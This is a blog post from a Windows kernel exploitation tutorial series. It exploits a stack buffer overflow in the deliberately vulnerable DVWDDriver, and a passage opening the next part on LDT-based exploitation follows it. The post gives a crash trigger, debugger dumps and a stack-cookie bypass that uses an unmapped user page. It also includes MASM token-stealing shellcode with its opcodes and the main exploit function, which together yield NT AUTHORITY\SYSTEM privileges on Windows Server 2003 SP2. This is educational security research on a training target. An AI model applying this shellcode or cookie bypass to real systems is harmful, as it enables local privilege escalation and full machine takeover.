Sunday, 17 July 2011

Windows Kernel Exploitation Basics - Part 4 : Stack-based Buffer Overflow exploitation (bypassing cookie)



In this article, we'll exploit the Stack-based Buffer Overflow that is present in the DVWDDriver when we pass an oversized buffer to the driver with the DEVICEIO_DVWD_STACKOVERFLOW IOCTL. The concept of buffer overflow in kernelland is the same as in userland. Basically, we've got a buffer that sits in kernelland and we are able to overflow it, here because the function RtlCopyMemory() is misused, as we've seen in the first article of this series.
First of all, we'll see how to detect such a vulnerability in a driver and then we'll go through the exploitation process, based on the information given in the book "A guide to Kernel Exploitation" and on some papers that have been released on the topic.

1. Triggering the vulnerability

In order to trigger the vulnerability, I've made this small piece of code:
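#include <windows.h>
#include <winioctl.h>
#include <stdio.h>
#include <string.h>
#include <conio.h>

/* IOCTL */
#define DEVICEIO_DVWD_STACKOVERFLOW  CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)

int main(int argc, char *argv[]) {
 
 char junk[512];
 HANDLE hDevice;
 DWORD dwReturn = 0;   /* must not be NULL when lpOverlapped is NULL */
 
 printf("--[ Fuzz IOCTL DEVICEIO_DVWD_STACKOVERFLOW ---------------------------\n");
 
 printf("[~] Building junk data to send to the driver...\n");
 memset(junk, 'A', 511);
 junk[511] = '\0';
 
 printf("[~] Open a handle to the driver DVWD...\n");
 hDevice = CreateFileA("\\\\.\\DVWD", 
    GENERIC_READ | GENERIC_WRITE, 
    FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, 
    NULL, 
    OPEN_EXISTING, 
    0, 
    NULL);
 if (hDevice == INVALID_HANDLE_VALUE) {
  printf("[!] Unable to open the device (error %lu)\n", GetLastError());
  return 1;
 }
 printf("\tHandle: %p\n",hDevice);
 _getch();   /* wait for a key press before sending the IOCTL */
 
 printf("[~] Send IOCTL DEVICEIO_DVWD_STACKOVERFLOW with junk data...\n");
 /* strlen(junk) == 511: only the 'A's are sent, not the terminating '\0' */
 DeviceIoControl(hDevice, DEVICEIO_DVWD_STACKOVERFLOW, junk, (DWORD)strlen(junk), NULL, 0, &dwReturn, NULL);

 
 CloseHandle(hDevice);
 return 0;
}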

The code is straightforward: it fills a 512-byte buffer with junk data (511 'A's followed by '\0') and sends the 511 'A's to the driver. This is more than enough to overflow the buffer used by the driver, which is only 64 bytes long =)
Okay, so let's compile and run the previous code. Here's what we get:


BOOM! A nice Blue Screen Of Death!

Now, we'll attach the Windows VM used for the tests to a remote kernel debugger, which is itself running in another Windows VM. All the details about how to set up remote debugging using VMWare are given in the article [3].

We run the code again, and the Windows VM freezes after sending the buffer to the driver:



... Meanwhile, the remote kernel debugger detects the "fatal system error":

*** Fatal System Error: 0x000000f7
                       (0xB497BD51,0xF786C6EA,0x08793915,0x00000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

To get more information (a crash analysis), we type !analyze -v, and we get:

kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer.  This overrun could potentially
allow a malicious user to gain control of this machine.
DESCRIPTION
A driver overran a stack-based buffer (or local variable) in a way that would
have overwritten the function's return address and jumped back to an arbitrary
address when the function returned.  This is the classic "buffer overrun"
hacking attack and the system has been brought down to prevent a malicious user
from gaining complete control of it.
Do a kb to get a stack backtrace -- the last routine on the stack before the
buffer overrun handlers and bugcheck call is the one that overran its local
variable(s).
Arguments:
Arg1: b497bd51, Actual security check cookie from the stack
Arg2: f786c6ea, Expected security check cookie
Arg3: 08793915, Complement of the expected security check cookie
Arg4: 00000000, zero

Debugging Details:
------------------


DEFAULT_BUCKET_ID:  GS_FALSE_POSITIVE_MISSING_GSFRAME

SECURITY_COOKIE:  Expected f786c6ea found b497bd51

BUGCHECK_STR:  0xF7

PROCESS_NAME:  fuzzIOCTL.EXE

CURRENT_IRQL:  0

LAST_CONTROL_TRANSFER:  from 80825b5b to 8086cf70

STACK_TEXT:
f5d6f770 80825b5b 00000003 b497bd51 00000000 nt!RtlpBreakWithStatusInstruction
f5d6f7bc 80826a4f 00000003 000001ff 0012fcdc nt!KiBugCheckDebugBreak+0x19
f5d6fb54 80826de7 000000f7 b497bd51 f786c6ea nt!KeBugCheck2+0x5d1
f5d6fb74 f7858662 000000f7 b497bd51 f786c6ea nt!KeBugCheckEx+0x1b
WARNING: Stack unwind information not available. Following frames may be wrong.
f5d6fb94 f7858316 f785808c 02503afa 82499078 DVWDDriver!DvwdHandleIoctlStackOverflow+0x5ce
f5d6fc10 41414141 41414141 41414141 41414141 DVWDDriver!DvwdHandleIoctlStackOverflow+0x282
f5d6fc14 41414141 41414141 41414141 41414141 0x41414141
f5d6fc18 41414141 41414141 41414141 41414141 0x41414141
[...]
f5d6fd20 41414141 41414141 41414141 41414141 0x41414141
f5d6fd24 41414141 41414141 41414141 41414141 0x41414141


STACK_COMMAND:  kb

FOLLOWUP_IP:
DVWDDriver!DvwdHandleIoctlStackOverflow+5ce
f7858662 cc              int     3

SYMBOL_STACK_INDEX:  4

SYMBOL_NAME:  DVWDDriver!DvwdHandleIoctlStackOverflow+5ce

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: DVWDDriver

IMAGE_NAME:  DVWDDriver.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  4e08f4d5

FAILURE_BUCKET_ID:  0xF7_MISSING_GSFRAME_DVWDDriver!DvwdHandleIoctlStackOverflow+5ce

BUCKET_ID:  0xF7_MISSING_GSFRAME_DVWDDriver!DvwdHandleIoctlStackOverflow+5ce

So, this is the proof that the kernel stack has been overflowed. We can see all our 'A's (0x41) in the dump of the stack at the time of the crash. But what is important to notice here is the error message, DRIVER_OVERRAN_STACK_BUFFER (f7), which means that the overflow has been detected: the check compiled into the driver failed and called KeBugCheckEx(), as the stack trace shows. This error confirms that a Stack-Cookie - also called a Stack-Canary - is used in order to detect stack overflows... well, to try to detect them =). The principle is the same as in userland with the /GS flag of the MS Visual Studio compiler. Basically, a security cookie (a pseudo-random 4-byte value) is put on the stack between the local variables and the saved value of EBP, so that we have to overwrite this value if we want to reach and overwrite the saved EIP value (the return address). And of course, in the epilogue of the function, the security cookie value is checked against the original value (expected value). If they don't match, the fatal error we are facing is triggered!
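To make the cookie check concrete, here is a minimal userland sketch in C. It is only a simulation under stated assumptions: `mock_frame` and `copy_and_check` are hypothetical names, the frame layout is simplified, and the XOR with EBP reflects how /GS-style code usually stores the cookie rather than anything read from the driver's source. The copy stays inside the mock structure, so nothing is really overflowed.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define LOCAL_BUF_SIZE 64

/* Mock of a protected stack frame, from low to high addresses. */
struct mock_frame {
    unsigned char buffer[LOCAL_BUF_SIZE]; /* local buffer filled by the copy */
    uint32_t cookie;                      /* stored as expected_cookie ^ EBP */
    uint32_t saved_ebp;
    uint32_t return_address;
};

/* Simulates prologue, unchecked copy and epilogue check.
 * Returns 1 if the cookie is intact, 0 if the overrun is detected.
 * The value the check would report is written to *actual_out. */
static int copy_and_check(const unsigned char *src, size_t n,
                          uint32_t expected_cookie, uint32_t frame_ebp,
                          uint32_t *actual_out)
{
    struct mock_frame frame;
    uint32_t actual;

    assert(n <= sizeof frame);                  /* keep the simulation in bounds */
    memset(&frame, 0, sizeof frame);
    frame.cookie = expected_cookie ^ frame_ebp; /* prologue */
    memcpy(&frame, src, n);                     /* copy with no length check */
    actual = frame.cookie ^ frame_ebp;          /* epilogue */
    if (actual_out != NULL)
        *actual_out = actual;
    return actual == expected_cookie;
}
```

With 64 bytes the check passes; from 68 bytes on it fails. Feeding it 'A's with a frame pointer of 0xf5d6fc10 reports 0xb497bd51, which is consistent with the "Actual security check cookie" shown in the bugcheck above (0x41414141 XOR 0xf5d6fc10).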

2. Stack-Canary ?

If we disassemble the vulnerable function, here is what we can see:


In the prologue of the function, there is a call to __SEH_prolog4_GS. This function is used to:
  • Set up the exception handler block (EXCEPTION_REGISTRATION_RECORD) corresponding to the __try { } __except { } written in the function,
  • Set up the Stack-Canary

Moreover, in the epilogue of the function, we can see a call to __SEH_epilog4_GS. This function retrieves the current value of the Stack-Canary and calls the __security_check_cookie() function, which compares the current value with the expected value of the Stack-Canary. This expected value (symbol: __security_cookie) is stored in the .data segment. If the values don't match, the OS crashes in the same way as during the previous test.



3. How to bypass the Stack-Canary in KernelLand ?

In order to bypass the Stack-Canary, the goal is to trigger an exception before the check of the cookie, that is to say before the call to the __security_check_cookie() function. In userland, the typical way to do it is to send a buffer large enough to write past the end of the stack, until we reach an unmapped page and cause a memory fault. However, it doesn't work in kernelland because memory fault exceptions that occur in kernel memory areas are not handled by exception handlers: they simply crash the OS (BSOD).

So, the idea is to generate a memory fault exception due to the access of an unmapped page in userland, not in kernelland. To do so, we'll create a mapped memory area (anonymous map) using the CreateFileMapping() (see [1]) and MapViewOfFileEx() (see [2]) API calls. Then we fill this area with the address of the shellcode we'll write later on.
It's important to understand that we pass a pointer to a user-space buffer, and its size, to the driver when we send a DEVICEIO_DVWD_STACKOVERFLOW IOCTL. The trick is to adjust the pointer to the buffer in such a way that the end of the buffer sits in the unmapped page that follows. It's actually sufficient to put only the last 4 bytes of the buffer outside the anonymous map. This is well illustrated in the book by the authors of DVWDDriver with this figure:



By doing so, when the driver reads the content of the buffer (for the copy), it ends up trying to read an unmapped memory area in userland. Therefore an exception is triggered before the cookie is checked, and it becomes possible to bypass the Stack-Canary by using SEH exploitation in kernelland.
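The pointer adjustment is plain arithmetic, and a small C sketch may help to see it. The helper names `straddle_offset` and `readable_bytes` are hypothetical, and the sizes used in the example (a 64 KB mapping, a 128-byte buffer) are assumptions chosen for illustration only.

```c
#include <assert.h>
#include <stddef.h>

/* Offset, from the start of a mapping of map_size bytes, at which a buffer
 * of buf_size bytes must start so that exactly `tail` bytes fall past the
 * end of the mapping. */
static size_t straddle_offset(size_t map_size, size_t buf_size, size_t tail)
{
    assert(tail <= buf_size);
    assert(buf_size - tail <= map_size);
    return map_size - (buf_size - tail);
}

/* Number of bytes a sequential reader gets through before it touches the
 * first byte outside the mapping. */
static size_t readable_bytes(size_t buf_size, size_t tail)
{
    assert(tail <= buf_size);
    return buf_size - tail;
}
```

For a 0x10000-byte mapping and a 128-byte buffer with 4 bytes hanging out, the buffer starts at offset 0xFF84 and a reader can fetch 124 bytes before faulting.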


4. Shellcoding

I've decided not to use the same shellcode as the one given in the DVWDExploit for my tests. Instead of patching the SID in the Access Token of the exploit process, I would like to use another privilege escalation method: stealing the Access Token of a process that is running with Owner SID == NT AUTHORITY\SYSTEM SID, and overwriting the Access Token of the exploit process with the stolen one.

I haven't reinvented the wheel to write the shellcode, I just referred to the following two great papers: [4] and [5]. The shellcode I've used is directly taken/adapted from those papers. The algorithm is the following:

  1. Find the _KTHREAD structure corresponding to the current thread, from _KPRCB
  2. Find the _EPROCESS structure corresponding to the current process, from _KTHREAD
  3. Look for the _EPROCESS corresponding to the process with PID=4 (UniqueProcessId = 4); this is the "System" process, which always has SID = NT AUTHORITY\SYSTEM SID.
  4. Retrieve the address of the Token of that process
  5. Look for the _EPROCESS corresponding to the process we want to escalate
  6. Replace the Token of that process with the Token of the "System" process
  7. Return to userland using the SYSEXIT instruction. Before executing SYSEXIT, we set the registers as explained in [4] in order to jump directly to our payload in userland, which will run with full privileges.
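Steps 3 and 5 both walk a circular doubly linked list and convert each link back to the record that contains it. The following userland sketch in C shows that pattern on mock data. `mock_process`, `link_ring` and `find_by_pid` are hypothetical names, the structure is not the real _EPROCESS layout, and, unlike the shellcode further down, the loop stops after one full turn when nothing matches.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
};

/* Mock record: a PID followed by the list links, nothing else. */
struct mock_process {
    uintptr_t pid;
    struct list_entry links;
};

/* Converts a pointer to the embedded links back to the containing record. */
#define PROCESS_FROM_LINKS(p) \
    ((struct mock_process *)((char *)(p) - offsetof(struct mock_process, links)))

/* Links an array of records into a ring. */
static void link_ring(struct mock_process *procs, size_t count)
{
    size_t i;

    assert(count > 0);
    for (i = 0; i < count; i++) {
        size_t next = (i + 1) % count;
        procs[i].links.flink = &procs[next].links;
        procs[next].links.blink = &procs[i].links;
    }
}

/* Follows flink from `start` until a record with the given PID is found.
 * Returns NULL after one full turn without a match. */
static struct mock_process *find_by_pid(struct mock_process *start, uintptr_t pid)
{
    struct mock_process *cur = start;

    do {
        if (cur->pid == pid)
            return cur;
        cur = PROCESS_FROM_LINKS(cur->links.flink);
    } while (cur != start);
    return NULL;
}
```

The subtraction in PROCESS_FROM_LINKS plays the same role as the "sub eax, offset" that follows each Flink load in the assembly version.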

The first step consists in finding the right offsets in the kernel structures for Windows Server 2003 SP2. To do so, we're going to dig into those structures using kd:

kd> r
eax=00000001 ebx=000063a3 ecx=80896d4c edx=000002f8 esi=00000000 edi=ed8fcfa8
eip=8086cf70 esp=80894560 ebp=80894570 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000202

kd> dg @fs
                                  P Si Gr Pr Lo
Sel    Base     Limit     Type    l ze an es ng Flags
---- -------- -------- ---------- - -- -- -- -- --------
0030 ffdff000 00001fff Data RW    0 Bg Pg P  Nl 00000c92

kd> dt nt!_kpcr ffdff000
   [...]
   +0x120 PrcbData         : _KPRCB
   
kd> dt nt!_kprcb ffdff000+0x120
   +0x000 MinorVersion     : 1
   +0x002 MajorVersion     : 1
   +0x004 CurrentThread    : 0x80896e40 _KTHREAD
   +0x008 NextThread       : (null)
   +0x00c IdleThread       : 0x80896e40 _KTHREAD
   [...]


kd> dt nt!_kthread 0x80896e40
   +0x000 Header           : _DISPATCHER_HEADER
   +0x010 MutantListHead   : _LIST_ENTRY [ 0x80896e50 - 0x80896e50 ]
   +0x018 InitialStack     : 0x808948b0 Void
   +0x01c StackLimit       : 0x808918b0 Void
   +0x020 KernelStack      : 0x808945fc Void
   +0x024 ThreadLock       : 0
   +0x028 ApcState         : _KAPC_STATE
   +0x028 ApcStateFill     : [23]  "hn???"
   +0x03f ApcQueueable     : 0x1 ''
   [...]
   
   
kd> dt nt!_kapc_state 0x80896e40+0x28
   +0x000 ApcListHead      : [2] _LIST_ENTRY [ 0x80896e68 - 0x80896e68 ]
   +0x010 Process          : 0x808970c0 _KPROCESS
   +0x014 KernelApcInProgress : 0 ''
   +0x015 KernelApcPending : 0 ''
   +0x016 UserApcPending   : 0 ''
   
kd> dt nt!_eprocess 0x808970c0
   +0x000 Pcb              : _KPROCESS
   +0x078 ProcessLock      : _EX_PUSH_LOCK
   +0x080 CreateTime       : _LARGE_INTEGER 0x0
   +0x088 ExitTime         : _LARGE_INTEGER 0x0
   +0x090 RundownProtect   : _EX_RUNDOWN_REF
   +0x094 UniqueProcessId  : (null)
   +0x098 ActiveProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x0a0 QuotaUsage       : [3] 0
   +0x0ac QuotaPeak        : [3] 0
   +0x0b8 CommitCharge     : 0
   +0x0bc PeakVirtualSize  : 0
   +0x0c0 VirtualSize      : 0
   +0x0c4 SessionProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x0cc DebugPort        : (null)
   +0x0d0 ExceptionPort    : (null)
   +0x0d4 ObjectTable      : 0xe1000c60 _HANDLE_TABLE
   +0x0d8 Token            : _EX_FAST_REF
   +0x0dc WorkingSetPage   : 0x17f40
   [...]
   
kd> dt nt!_list_entry
   +0x000 Flink            : Ptr32 _LIST_ENTRY
   +0x004 Blink            : Ptr32 _LIST_ENTRY

kd> dt nt!_token -r1 @@(0xe1001727 & ~7)
   +0x000 TokenSource      : _TOKEN_SOURCE
      +0x000 SourceName       : [8]  "*SYSTEM*"
      +0x008 SourceIdentifier : _LUID
   +0x010 TokenId          : _LUID
      +0x000 LowPart          : 0x3ea
      +0x004 HighPart         : 0n0
   +0x018 AuthenticationId : _LUID
      +0x000 LowPart          : 0x3e7
      +0x004 HighPart         : 0n0
   +0x020 ParentTokenId    : _LUID
      +0x000 LowPart          : 0
      +0x004 HighPart         : 0n0
   +0x028 ExpirationTime   : _LARGE_INTEGER 0x6207526`b64ceb90
      +0x000 LowPart          : 0xb64ceb90
      +0x004 HighPart         : 0n102790438
      +0x000 u                : __unnamed
      +0x000 QuadPart         : 0n441481572610010000
   [...]

From this, we can deduce the following offsets that will be useful for writing the shellcode for Windows Server 2003 SP2:

  • _KTHREAD: its address is stored at fs:[0x124] (in kernel mode the FS segment points to _KPCR, and 0x124 = 0x120 for PrcbData + 0x4 for CurrentThread)
  • _EPROCESS: its address is stored at offset 0x38 from the beginning of _KTHREAD (0x28 for ApcState + 0x10 for Process)
  • _EPROCESS.ActiveProcessLinks: it is a doubly linked list that links all the _EPROCESS structures (for all the processes). It's located at offset 0x98 from the beginning of _EPROCESS. This offset is also that of the pointer to the next element (Flink) in the list.
  • _EPROCESS.UniqueProcessId: it is the PID of the corresponding process. It is located at offset 0x94 from the beginning of _EPROCESS.
  • _EPROCESS.Token: it is an _EX_FAST_REF that holds the pointer to the Access Token. The offset in _EPROCESS is 0xD8. Note that the token address is aligned on 8 bytes, so the 3 low-order bits of the stored value must be masked to obtain it.
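The masking mentioned for the Token field can be checked with a couple of lines of C. This is a sketch with hypothetical helper names. The value 0xe1001727 is the one used in the kd session above, and treating the 3 low bits as a reference count is the usual reading of _EX_FAST_REF on 32-bit Windows.

```c
#include <assert.h>
#include <stdint.h>

#define FAST_REF_MASK 0x7u   /* 3 low bits on 32-bit Windows */

/* Pointer part of an _EX_FAST_REF value. */
static uint32_t fast_ref_object(uint32_t value)
{
    return value & ~FAST_REF_MASK;
}

/* Low bits of an _EX_FAST_REF value (cached reference count). */
static uint32_t fast_ref_count(uint32_t value)
{
    uint32_t count = value & FAST_REF_MASK;

    /* The two parts must recombine into the original value. */
    assert((fast_ref_object(value) | count) == value);
    return count;
}
```

This is the same operation as the "and edi, 0fffffff8h" instruction in the shellcode and as the "& ~7" typed in kd.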
.486
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
assume fs:nothing

.code

shellcode:

; ----------------------------------------------------------------------
;                  Shellcode for Windows Server 2k3
; ----------------------------------------------------------------------

; Offsets
WIN2K3_KTHREAD_OFFSET   equ 124h    ; nt!_KPCR.PrcbData.CurrentThread
WIN2K3_EPROCESS_OFFSET  equ 038h    ; nt!_KTHREAD.ApcState.Process
WIN2K3_FLINK_OFFSET     equ 098h    ; nt!_EPROCESS.ActiveProcessLinks.Flink
WIN2K3_PID_OFFSET       equ 094h    ; nt!_EPROCESS.UniqueProcessId
WIN2K3_TOKEN_OFFSET     equ 0d8h    ; nt!_EPROCESS.Token
WIN2K3_SYS_PID          equ 04h     ; PID Process SYSTEM


pushad                                ; save registers

mov eax, fs:[WIN2K3_KTHREAD_OFFSET]   ; EAX <- current _KTHREAD
mov eax, [eax+WIN2K3_EPROCESS_OFFSET] ; EAX <- current _KPROCESS == _EPROCESS
push eax


mov ebx, WIN2K3_SYS_PID

SearchProcessPidSystem:

mov eax, [eax+WIN2K3_FLINK_OFFSET]    ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
sub eax, WIN2K3_FLINK_OFFSET          ; EAX <- _EPROCESS of the next process
cmp [eax+WIN2K3_PID_OFFSET], ebx      ; UniqueProcessId == SYSTEM PID ?
jne SearchProcessPidSystem            ; if no, retry with the next process...

mov edi, [eax+WIN2K3_TOKEN_OFFSET]    ; EDI <- Token of process with SYSTEM PID
and edi, 0fffffff8h                   ; Must be aligned by 8

pop eax                               ; EAX <- current _EPROCESS 


mov ebx, 41414141h

SearchProcessPidToEscalate:

mov eax, [eax+WIN2K3_FLINK_OFFSET]    ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
sub eax, WIN2K3_FLINK_OFFSET          ; EAX <- _EPROCESS of the next process
cmp [eax+WIN2K3_PID_OFFSET], ebx      ; UniqueProcessId == PID of the process 
                                      ; to escalate ?
jne SearchProcessPidToEscalate        ; if no, retry with the next process...

SwapTokens:

mov [eax+WIN2K3_TOKEN_OFFSET], edi    ; We replace the token of the process 
                                      ; to escalate by the token of the process
                                      ; with SYSTEM PID

PartyIsOver:

popad                                 ; restore registers
mov edx, 11111111h                    ; EIP value after SYSEXIT
mov ecx, 22222222h                    ; ESP value after SYSEXIT
mov eax, 3Bh                          ; FS value in userland (points to _TEB)
db 8Eh, 0E0h                          ; mov fs, ax
db 0Fh, 35h                           ; SYSEXIT

end shellcode

We assemble this asm code with MASM and we retrieve the corresponding sequence of opcodes (Tools > Load Binary File as Hex)... we get:
00000200 :60 64 A1 24 01 00 00 8B - 40 38 50 BB 04 00 00 00
00000210 :8B 80 98 00 00 00 2D 98 - 00 00 00 39 98 94 00 00
00000220 :00 75 ED 8B B8 D8 00 00 - 00 83 E7 F8 58 BB 41 41
00000230 :41 41 8B 80 98 00 00 00 - 2D 98 00 00 00 39 98 94
00000240 :00 00 00 75 ED 89 B8 D8 - 00 00 00 61 BA 11 11 11
00000250 :11 B9 22 22 22 22 B8 3B - 00 00 00 8E E0 0F 35 00

Of course, before using this shellcode, it's necessary to replace the placeholder values: the PID of the process to escalate (41414141h), and the EIP (11111111h) and ESP (22222222h) values to use after SYSEXIT. We'll do that in the code before sending the buffer.
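Replacing a placeholder boils down to finding a 32-bit marker in a byte array and overwriting it. Here is a generic sketch in C. `patch_marker32` is a hypothetical helper, not one of the functions of the exploit, and it assumes the little-endian byte order of x86.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Replaces the first occurrence of the 32-bit `marker` (stored little-endian)
 * in buf with `value`. Returns the offset of the patch, or -1 if the marker
 * is not present. */
static long patch_marker32(unsigned char *buf, size_t len,
                           uint32_t marker, uint32_t value)
{
    unsigned char m[4], v[4];
    size_t i;

    assert(buf != NULL);
    for (i = 0; i < 4; i++) {
        m[i] = (unsigned char)(marker >> (8 * i));
        v[i] = (unsigned char)(value >> (8 * i));
    }
    for (i = 0; i + 4 <= len; i++) {
        if (memcmp(buf + i, m, 4) == 0) {
            memcpy(buf + i, v, 4);
            return (long)i;
        }
    }
    return -1;
}
```

Returning the offset makes it easy to verify that the marker was found exactly where it was expected, and a return value of -1 on a second call confirms that the placeholder is gone.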

5. Methodology of exploitation

The exploitation process is the following:

  1. Create an executable memory area and put the previous shellcode (for swapping tokens) in that area.
  2. Similarly, create an executable memory area and put the shellcode that must be executed after the privilege escalation (the payload)
  3. Update the first shellcode with: PID of the process to escalate, EIP to use after SYSEXIT, ESP to use after SYSEXIT. The method is taken from [4].
  4. Create an anonymous map for our buffer
  5. Fill this map with the address of the first shellcode
  6. Adjust the pointer to the buffer in such a way that the last 4 bytes are in an unmapped memory area
  7. Send the buffer to the driver with the DEVICEIO_DVWD_STACKOVERFLOW IOCTL.

6. Exploit code

Here is the main function of the exploit. It should be quite straightforward after the previous explanations.

VOID TriggerOverflow32(VOID) {

 HANDLE hFile;
 DWORD dwReturn;
 UCHAR* map;
 UCHAR *uBuff = NULL;
 BOOL ret;
 ULONG_PTR pShellcode;

 // Load the Kernel Executive ntoskrnl.exe in userland and get some 
 // symbol's kernel address
 if(LoadAndGetKernelBase() == FALSE)
  return;

 
 // Put the shellcodes in executable memory
 mapShellcodeSwapTokens = (UCHAR *)CreateUspaceExecMapping(1);
 mapShellcodePayload    = (UCHAR *)CreateUspaceExecMapping(1);

 memset(mapShellcodeSwapTokens, '\x00', GlobalInfo.dwAllocationGranularity);
 memset(mapShellcodePayload, '\x00', GlobalInfo.dwAllocationGranularity);

 RtlCopyMemory(mapShellcodeSwapTokens, ShellcodeSwapTokens, sizeof(ShellcodeSwapTokens));
 RtlCopyMemory(mapShellcodePayload, ShellcodePayload, sizeof(ShellcodePayload));


 // Added
 printf("[~] Update Shellcode with PID of the process...\n");
 if(!MajShellcodePid(L"DVWDExploit.exe")) {
  printf("[!] An error occurred, exiting...\n");
  return;
 }

 printf("[~] Update Shellcode with EIP to use after SYSEXIT...\n");
 if(!MajShellcodeEip()) {
  printf("[!] An error occurred, exiting...\n");
  return;
 }

 printf("[~] Update Shellcode with ESP to use after SYSEXIT...\n");
 if(!MajShellcodeEsp()) {
  printf("[!] An error occurred, exiting...\n");
  return;
 }
 
 printf("[~] Retrieve the address of the shellcode and build the buffer...\n");

 // Create an anonymous map
 map = (UCHAR *)CreateUspaceMapping(1);
 // Retrieve the address of the shellcode
 pShellcode = (ULONG_PTR)mapShellcodeSwapTokens;
 
 // We fill the map with the address of our shellcode (the address is repeated)
 FillMap(map, pShellcode, GlobalInfo.dwAllocationGranularity);

 // We adjust the pointer to the buffer (size = BUFF_SIZE) in such a way that the 
 // last 4 bytes are in an unmapped memory area
 uBuff = map + GlobalInfo.dwAllocationGranularity - (BUFF_SIZE-sizeof(ULONG_PTR));

 // Now, we send our buffer to the driver and trigger the overflow
 hFile = CreateFile(_T("\\\\.\\DVWD"), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
 deviceHandle = hFile;

 if(hFile != INVALID_HANDLE_VALUE)
  ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STACKOVERFLOW, uBuff, BUFF_SIZE, NULL, 0, &dwReturn, NULL);

 // If you get here the vulnerability has not been triggered ...
 printf("[!] Stack overflow has not been triggered, maybe the driver has not been loaded ?\n");
 return;
}

7. All your base are belong to us


For testing purposes, I've used a simple windows/exec calc.exe shellcode from Metasploit as the payload. However, we can put whatever we want there...


Our calc.exe is running with NT AUTHORITY\SYSTEM privileges, which means that the privilege escalation has succeeded and that the payload has then been executed correctly.


References

[1] CreateFileMapping() function
http://msdn.microsoft.com/en-us/library/aa366537(v=vs.85).aspx

[2] MapViewOfFileEx() function 
http://msdn.microsoft.com/en-us/library/aa366763(v=VS.85).aspx

[3] Remote Debugging using VMWare
http://www.catch22.net/tuts/vmware

[4] Local Stack Overflow in Windows Kernel, by Heurs
http://www.ghostsinthestack.org/article-29-local-stack-overflow-in-windows-kernel.html

[5] Exploiting Windows Device Drivers, by Piotr Bania
http://pb.specialised.info/all/articles/ewdd.pdf

Windows Kernel Exploitation Basics - Part 3 : Arbitrary Memory Overwrite exploitation using LDT



In the previous post, we saw an exploitation of the write-what-where vulnerability in DVWDDriver based on overwriting a pointer located in the kernel dispatch table HalDispatchTable. That technique relies on an undocumented syscall, so the problem is that it is not guaranteed to keep working in the same form after future system updates, as is well pointed out in the great paper [1]. Instead, the new technique detailed in this post is based on the hardware-specific structures GDT and LDT, which are more likely to remain the same across the different Windows versions. This is another method that is briefly presented in the book "A guide to Kernel Exploitation". First of all, some background about GDT and LDT is required, so we'll take our Intel Manual and look at that now =)

1. Windows GDT and LDT

According to the Intel Manual [2], Segmentation is implemented using a Segment Selector, which is a 16-bit value. Actually, a Logical Address is composed of:
  • An offset address, which is a 32-bit value,
  • A Segment Selector, which is a 16-bit value.
Because a picture is worth a thousand words, here's a global overview of the Segmentation and Paging mechanisms (Logical address -> Linear address -> Physical address):



    The previous figure shows how the logical address is translated into a linear address thanks to Segmentation. Then, we can see that the Paging mechanism comes into play. Basically, it consists in translating the linear address into a physical address. Paging is actually an optional Intel feature; if it is not used, linear address == physical address. Windows uses Paging, so the linear address is just another structure split into 3 subfields. The values of those subfields are used as offsets into arrays in order to get the physical address.

    Moreover, we can see that the Segment Selector references an entry in a table and that this entry actually describes a segment (Segment Descriptor) in linear address space: this table is the GDT. Ok, but how does it really work, and wtf is that LDT ?! Let's go back to our Intel Manual... =)

    We learn that the GDT (Global Descriptor Table) and the LDT (Local Descriptor Table) are the 2 kinds of Segment Descriptor tables. We can also see this awesome figure:
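To illustrate the "3 subfields" of a linear address, here is a short C sketch. It assumes classic 32-bit paging with 4 KB pages and no PAE (10 bits of page-directory index, 10 bits of page-table index, 12 bits of offset). `linear_parts` and `split_linear` are hypothetical names, and a PAE system would split the address differently.

```c
#include <assert.h>
#include <stdint.h>

struct linear_parts {
    uint32_t dir_index;    /* bits 31..22: index into the page directory */
    uint32_t table_index;  /* bits 21..12: index into the page table     */
    uint32_t offset;       /* bits 11..0 : offset inside the 4 KB page   */
};

/* Splits a 32-bit linear address into its three subfields. */
static struct linear_parts split_linear(uint32_t linear)
{
    struct linear_parts p;

    p.dir_index   = linear >> 22;
    p.table_index = (linear >> 12) & 0x3FFu;
    p.offset      = linear & 0xFFFu;
    /* The three fields must recombine into the original address. */
    assert(((p.dir_index << 22) | (p.table_index << 12) | p.offset) == linear);
    return p;
}
```

For example, 0x12345678 splits into directory index 0x48, table index 0x345 and offset 0x678.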



    Having a GDT is mandatory: every system must create one when it starts up. There is a single GDT per processor for the entire system (that's why it's a "global" table) and it can be shared by all the tasks on the system. Using an LDT is optional; it can be used by a single task or by a group of related tasks. An LDT is defined by a single GDT entry and is specific to a process, which means that this entry is replaced in the GDT during a process context switch.

    To give more details, the GDT normally contains:
    • A pair of kernel-mode code and data Segment Descriptors, with DPL = 0 (the DPL defines the privilege level of the segment being referenced, ie. the ring)
    • A pair of user-mode code and data Segment Descriptors, with DPL = 3
    • One TSS (Task State Segment), with DPL = 0. See [3]
    • 3 Additional data segment entries.
    • An optional LDT entry
    By default, a new process doesn't have any LDT defined, but one can be allocated if the process requests it. If a process has a corresponding LDT, its descriptor can be found in the LdtDescriptor field of the kernel structure _KPROCESS corresponding to the process in question:

    kd> dt nt!_kprocess
       +0x000 Header           : _DISPATCHER_HEADER
